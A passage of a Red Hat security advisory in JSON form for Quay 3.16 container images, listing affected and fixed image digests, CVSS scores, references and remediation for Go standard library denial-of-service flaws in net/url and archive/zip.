"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:1ab0303614da22f6a9e3005358de62ba1079f90f2410481603eb33b5b2f7db70_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:401ad33f2305b2f3f54823135c9d25531d55936efb7d20ca1dac5b88efc71a28_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:7aa800901c5b9a158fe07c3a632bf95920af918f70753de3ef201d3be7684ca5_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:d8e040decc94bdb06eda60acb11ff111221d059495c706e3dc9cc8c124ec603b_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:0bc25ef16eabd14562b5c15b2f242558ace42865d416820420d669436d9d71ae_arm64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:3559638cc583d4a6e550d3572f9696dc488d8f75d6f7f77c9853c4881d98dd4a_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:39155eb5f845ade84925b763885a363b95ba927e91e2ee76d8df304620b9ac0e_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:de5cfa1742d9eed1e2d7b07693559f1cf52eca41fda6cfb83d226cf3f9bafb9e_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:618838ba45069cb93c48acc40c19186a5e471d4ea17f8f057a5187e74d196a9b_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:6f505834f4023e94f791769bb6726d24e8e94605ee525d4f657b38ec2810e06f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:bbd4e466a0973195c134bc7bd406a824a5e205201559931d2975fd337b435e7c_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:1ca15d4a3ec7067bb925e83588e5ac94674e77ba29969cba9137c07bafadc025_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:1d28e4844da6b1bd1e2fbad161ca68494cac166b9fa22b30a558e0d8a3c9d12d_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:4b923525f815b87f3375bd5346f8261746d2e172f2f83b4604c558c4d7ae64ee_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:7b90f185ddc5973be1bc4ffd27b785debb1d519cc6c0ea400a7fbbf22dfa2375_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1d0b2c18a32a5e1195a65e2c6fe5c79f8acd1695a56e848302621a87e5ec041c_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:342f40181bab7dcc4acdbf4d28fa314fc1dd9c9a3e9e99024e7c856f46fd8092_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:af9f4557f46bb29353be32e53f3c49d32d4641859a3ed385e69423a37b04fa03_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:b97e1ced70d68a5ff55dca3fe7962995f7f9559e7305660bdf829cc60e6cb2bd_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:a48e62759aae34528989bef0e959d1e7f8eeac108e3118bbd86e909882e1b775_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:8b059901d52536b850c65e2ed38d136b2cf831dc12af8a2eea71e584fcd49354_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:943935018ddabe868b693b6078580325ec04905fd1cf13553ef7e351427caf14_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b5e3b47f06c81244340ca599511d221efd830ff31ed15c5c3ab5ea4bbb45388f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:1ab0303614da22f6a9e3005358de62ba1079f90f2410481603eb33b5b2f7db70_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:401ad33f2305b2f3f54823135c9d25531d55936efb7d20ca1dac5b88efc71a28_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:7aa800901c5b9a158fe07c3a632bf95920af918f70753de3ef201d3be7684ca5_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:d8e040decc94bdb06eda60acb11ff111221d059495c706e3dc9cc8c124ec603b_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:0bc25ef16eabd14562b5c15b2f242558ace42865d416820420d669436d9d71ae_arm64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:3559638cc583d4a6e550d3572f9696dc488d8f75d6f7f77c9853c4881d98dd4a_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:39155eb5f845ade84925b763885a363b95ba927e91e2ee76d8df304620b9ac0e_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:de5cfa1742d9eed1e2d7b07693559f1cf52eca41fda6cfb83d226cf3f9bafb9e_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "golang: net/url: Memory exhaustion in query parameter parsing in net/url"
},
{
"cve": "CVE-2025-61728",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"discovery_date": "2026-01-28T20:01:39.965024+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:618838ba45069cb93c48acc40c19186a5e471d4ea17f8f057a5187e74d196a9b_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:6f505834f4023e94f791769bb6726d24e8e94605ee525d4f657b38ec2810e06f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:bbd4e466a0973195c134bc7bd406a824a5e205201559931d2975fd337b435e7c_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:1ca15d4a3ec7067bb925e83588e5ac94674e77ba29969cba9137c07bafadc025_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:1d28e4844da6b1bd1e2fbad161ca68494cac166b9fa22b30a558e0d8a3c9d12d_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:4b923525f815b87f3375bd5346f8261746d2e172f2f83b4604c558c4d7ae64ee_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:7b90f185ddc5973be1bc4ffd27b785debb1d519cc6c0ea400a7fbbf22dfa2375_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1d0b2c18a32a5e1195a65e2c6fe5c79f8acd1695a56e848302621a87e5ec041c_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:342f40181bab7dcc4acdbf4d28fa314fc1dd9c9a3e9e99024e7c856f46fd8092_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:af9f4557f46bb29353be32e53f3c49d32d4641859a3ed385e69423a37b04fa03_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:b97e1ced70d68a5ff55dca3fe7962995f7f9559e7305660bdf829cc60e6cb2bd_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:a48e62759aae34528989bef0e959d1e7f8eeac108e3118bbd86e909882e1b775_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:8b059901d52536b850c65e2ed38d136b2cf831dc12af8a2eea71e584fcd49354_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:943935018ddabe868b693b6078580325ec04905fd1cf13553ef7e351427caf14_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b5e3b47f06c81244340ca599511d221efd830ff31ed15c5c3ab5ea4bbb45388f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:1ab0303614da22f6a9e3005358de62ba1079f90f2410481603eb33b5b2f7db70_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:401ad33f2305b2f3f54823135c9d25531d55936efb7d20ca1dac5b88efc71a28_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:7aa800901c5b9a158fe07c3a632bf95920af918f70753de3ef201d3be7684ca5_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:d8e040decc94bdb06eda60acb11ff111221d059495c706e3dc9cc8c124ec603b_ppc64le"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2434431"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the archive/zip package in the Go standard library. A super-linear file name indexing algorithm is used in the first time a file in an archive is opened. A crafted zip archive containing a specific arrangement of file names can cause an excessive CPU and memory consumption. A Go application processing a malicious archive can become unresponsive or crash, resulting in a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "golang: archive/zip: Excessive CPU consumption when building archive index in archive/zip",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "To exploit this flaw, an attacker needs to be able to process a malicious zip archive with an application using the archive/zip package. Additionally, this vulnerability can cause a Go application to consume an excessive amount of CPU and memory, eventually resulting in a denial of service with no other security impact. Due to these reasons, this flaw has been rated with a moderate severity.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:0bc25ef16eabd14562b5c15b2f242558ace42865d416820420d669436d9d71ae_arm64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:3559638cc583d4a6e550d3572f9696dc488d8f75d6f7f77c9853c4881d98dd4a_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:39155eb5f845ade84925b763885a363b95ba927e91e2ee76d8df304620b9ac0e_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:de5cfa1742d9eed1e2d7b07693559f1cf52eca41fda6cfb83d226cf3f9bafb9e_s390x"
],
"known_not_affected": [
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:618838ba45069cb93c48acc40c19186a5e471d4ea17f8f057a5187e74d196a9b_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:6f505834f4023e94f791769bb6726d24e8e94605ee525d4f657b38ec2810e06f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:bbd4e466a0973195c134bc7bd406a824a5e205201559931d2975fd337b435e7c_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:1ca15d4a3ec7067bb925e83588e5ac94674e77ba29969cba9137c07bafadc025_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:1d28e4844da6b1bd1e2fbad161ca68494cac166b9fa22b30a558e0d8a3c9d12d_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:4b923525f815b87f3375bd5346f8261746d2e172f2f83b4604c558c4d7ae64ee_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:7b90f185ddc5973be1bc4ffd27b785debb1d519cc6c0ea400a7fbbf22dfa2375_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1d0b2c18a32a5e1195a65e2c6fe5c79f8acd1695a56e848302621a87e5ec041c_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:342f40181bab7dcc4acdbf4d28fa314fc1dd9c9a3e9e99024e7c856f46fd8092_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:af9f4557f46bb29353be32e53f3c49d32d4641859a3ed385e69423a37b04fa03_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:b97e1ced70d68a5ff55dca3fe7962995f7f9559e7305660bdf829cc60e6cb2bd_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:a48e62759aae34528989bef0e959d1e7f8eeac108e3118bbd86e909882e1b775_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:8b059901d52536b850c65e2ed38d136b2cf831dc12af8a2eea71e584fcd49354_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:943935018ddabe868b693b6078580325ec04905fd1cf13553ef7e351427caf14_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b5e3b47f06c81244340ca599511d221efd830ff31ed15c5c3ab5ea4bbb45388f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:1ab0303614da22f6a9e3005358de62ba1079f90f2410481603eb33b5b2f7db70_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:401ad33f2305b2f3f54823135c9d25531d55936efb7d20ca1dac5b88efc71a28_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:7aa800901c5b9a158fe07c3a632bf95920af918f70753de3ef201d3be7684ca5_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:d8e040decc94bdb06eda60acb11ff111221d059495c706e3dc9cc8c124ec603b_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-61728"
},
{
"category": "external",
"summary": "RHBZ#2434431",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2434431"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-61728",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61728"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-61728",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-61728"
},
{
"category": "external",
"summary": "https://go.dev/cl/736713",
"url": "https://go.dev/cl/736713"
},
{
"category": "external",
"summary": "https://go.dev/issue/77102",
"url": "https://go.dev/issue/77102"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/Vd2tYVM8eUc",
"url": "https://groups.google.com/g/golang-announce/c/Vd2tYVM8eUc"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2026-4342",
"url": "https://pkg.go.dev/vuln/GO-2026-4342"
}
],
"release_date": "2026-01-28T19:30:31.354000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-02T15:17:12+00:00",
"details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:0bc25ef16eabd14562b5c15b2f242558ace42865d416820420d669436d9d71ae_arm64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:3559638cc583d4a6e550d3572f9696dc488d8f75d6f7f77c9853c4881d98dd4a_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:39155eb5f845ade84925b763885a363b95ba927e91e2ee76d8df304620b9ac0e_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:de5cfa1742d9eed1e2d7b07693559f1cf52eca41fda6cfb83d226cf3f9bafb9e_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6497"
},
{
"category": "workaround",
"details": "To mitigate this vulnerability, implement a timeout in your archive/zip processing logic to abort the operation if it exceeds a few seconds, preventing the application from consuming an excessive amount of resources.",
"product_ids": [
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:618838ba45069cb93c48acc40c19186a5e471d4ea17f8f057a5187e74d196a9b_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:6f505834f4023e94f791769bb6726d24e8e94605ee525d4f657b38ec2810e06f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:bbd4e466a0973195c134bc7bd406a824a5e205201559931d2975fd337b435e7c_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:1ca15d4a3ec7067bb925e83588e5ac94674e77ba29969cba9137c07bafadc025_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:1d28e4844da6b1bd1e2fbad161ca68494cac166b9fa22b30a558e0d8a3c9d12d_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:4b923525f815b87f3375bd5346f8261746d2e172f2f83b4604c558c4d7ae64ee_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:7b90f185ddc5973be1bc4ffd27b785debb1d519cc6c0ea400a7fbbf22dfa2375_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1d0b2c18a32a5e1195a65e2c6fe5c79f8acd1695a56e848302621a87e5ec041c_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:342f40181bab7dcc4acdbf4d28fa314fc1dd9c9a3e9e99024e7c856f46fd8092_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:af9f4557f46bb29353be32e53f3c49d32d4641859a3ed385e69423a37b04fa03_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:b97e1ced70d68a5ff55dca3fe7962995f7f9559e7305660bdf829cc60e6cb2bd_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:a48e62759aae34528989bef0e959d1e7f8eeac108e3118bbd86e909882e1b775_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:8b059901d52536b850c65e2ed38d136b2cf831dc12af8a2eea71e584fcd49354_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:943935018ddabe868b693b6078580325ec04905fd1cf13553ef7e351427caf14_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b5e3b47f06c81244340ca599511d221efd830ff31ed15c5c3ab5ea4bbb45388f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:1ab0303614da22f6a9e3005358de62ba1079f90f2410481603eb33b5b2f7db70_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:401ad33f2305b2f3f54823135c9d25531d55936efb7d20ca1dac5b88efc71a28_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:7aa800901c5b9a158fe07c3a632bf95920af918f70753de3ef201d3be7684ca5_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:d8e040decc94bdb06eda60acb11ff111221d059495c706e3dc9cc8c124ec603b_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:0bc25ef16eabd14562b5c15b2f242558ace42865d416820420d669436d9d71ae_arm64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:3559638cc583d4a6e550d3572f9696dc488d8f75d6f7f77c9853c4881d98dd4a_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:39155eb5f845ade84925b763885a363b95ba927e91e2ee76d8df304620b9ac0e_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:de5cfa1742d9eed1e2d7b07693559f1cf52eca41fda6cfb83d226cf3f9bafb9e_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:618838ba45069cb93c48acc40c19186a5e471d4ea17f8f057a5187e74d196a9b_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:6f505834f4023e94f791769bb6726d24e8e94605ee525d4f657b38ec2810e06f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:bbd4e466a0973195c134bc7bd406a824a5e205201559931d2975fd337b435e7c_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:1ca15d4a3ec7067bb925e83588e5ac94674e77ba29969cba9137c07bafadc025_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:1d28e4844da6b1bd1e2fbad161ca68494cac166b9fa22b30a558e0d8a3c9d12d_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:4b923525f815b87f3375bd5346f8261746d2e172f2f83b4604c558c4d7ae64ee_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:7b90f185ddc5973be1bc4ffd27b785debb1d519cc6c0ea400a7fbbf22dfa2375_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1d0b2c18a32a5e1195a65e2c6fe5c79f8acd1695a56e848302621a87e5ec041c_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:342f40181bab7dcc4acdbf4d28fa314fc1dd9c9a3e9e99024e7c856f46fd8092_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:af9f4557f46bb29353be32e53f3c49d32d4641859a3ed385e69423a37b04fa03_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:b97e1ced70d68a5ff55dca3fe7962995f7f9559e7305660bdf829cc60e6cb2bd_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:a48e62759aae34528989bef0e959d1e7f8eeac108e3118bbd86e909882e1b775_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:8b059901d52536b850c65e2ed38d136b2cf831dc12af8a2eea71e584fcd49354_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:943935018ddabe868b693b6078580325ec04905fd1cf13553ef7e351427caf14_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b5e3b47f06c81244340ca599511d221efd830ff31ed15c5c3ab5ea4bbb45388f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:1ab0303614da22f6a9e3005358de62ba1079f90f2410481603eb33b5b2f7db70_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:401ad33f2305b2f3f54823135c9d25531d55936efb7d20ca1dac5b88efc71a28_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:7aa800901c5b9a158fe07c3a632bf95920af918f70753de3ef201d3be7684ca5_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:d8e040decc94bdb06eda60acb11ff111221d059495c706e3dc9cc8c124ec603b_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:0bc25ef16eabd14562b5c15b2f242558ace42865d416820420d669436d9d71ae_arm64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:3559638cc583d4a6e550d3572f9696dc488d8f75d6f7f77c9853c4881d98dd4a_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:39155eb5f845ade84925b763885a363b95ba927e91e2ee76d8df304620b9ac0e_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:de5cfa1742d9eed1e2d7b07693559f1cf52eca41fda6cfb83d226cf3f9bafb9e_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "golang: archive/zip: Excessive CPU consumption when building archive index in archive/zip"
},
{
"cve": "CVE-2025-68121",
"discovery_date": "2026-02-05T18:01:30.086058+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:618838ba45069cb93c48acc40c19186a5e471d4ea17f8f057a5187e74d196a9b_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:6f505834f4023e94f791769bb6726d24e8e94605ee525d4f657b38ec2810e06f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:bbd4e466a0973195c134bc7bd406a824a5e205201559931d2975fd337b435e7c_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:1ca15d4a3ec7067bb925e83588e5ac94674e77ba29969cba9137c07bafadc025_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:1d28e4844da6b1bd1e2fbad161ca68494cac166b9fa22b30a558e0d8a3c9d12d_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:4b923525f815b87f3375bd5346f8261746d2e172f2f83b4604c558c4d7ae64ee_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:7b90f185ddc5973be1bc4ffd27b785debb1d519cc6c0ea400a7fbbf22dfa2375_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1d0b2c18a32a5e1195a65e2c6fe5c79f8acd1695a56e848302621a87e5ec041c_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:342f40181bab7dcc4acdbf4d28fa314fc1dd9c9a3e9e99024e7c856f46fd8092_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:af9f4557f46bb29353be32e53f3c49d32d4641859a3ed385e69423a37b04fa03_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:b97e1ced70d68a5ff55dca3fe7962995f7f9559e7305660bdf829cc60e6cb2bd_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:a48e62759aae34528989bef0e959d1e7f8eeac108e3118bbd86e909882e1b775_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:8b059901d52536b850c65e2ed38d136b2cf831dc12af8a2eea71e584fcd49354_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:943935018ddabe868b693b6078580325ec04905fd1cf13553ef7e351427caf14_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b5e3b47f06c81244340ca599511d221efd830ff31ed15c5c3ab5ea4bbb45388f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:1ab0303614da22f6a9e3005358de62ba1079f90f2410481603eb33b5b2f7db70_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:401ad33f2305b2f3f54823135c9d25531d55936efb7d20ca1dac5b88efc71a28_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:7aa800901c5b9a158fe07c3a632bf95920af918f70753de3ef201d3be7684ca5_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:d8e040decc94bdb06eda60acb11ff111221d059495c706e3dc9cc8c124ec603b_ppc64le"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2437111"
}
],
"notes": [
{
"category": "description",
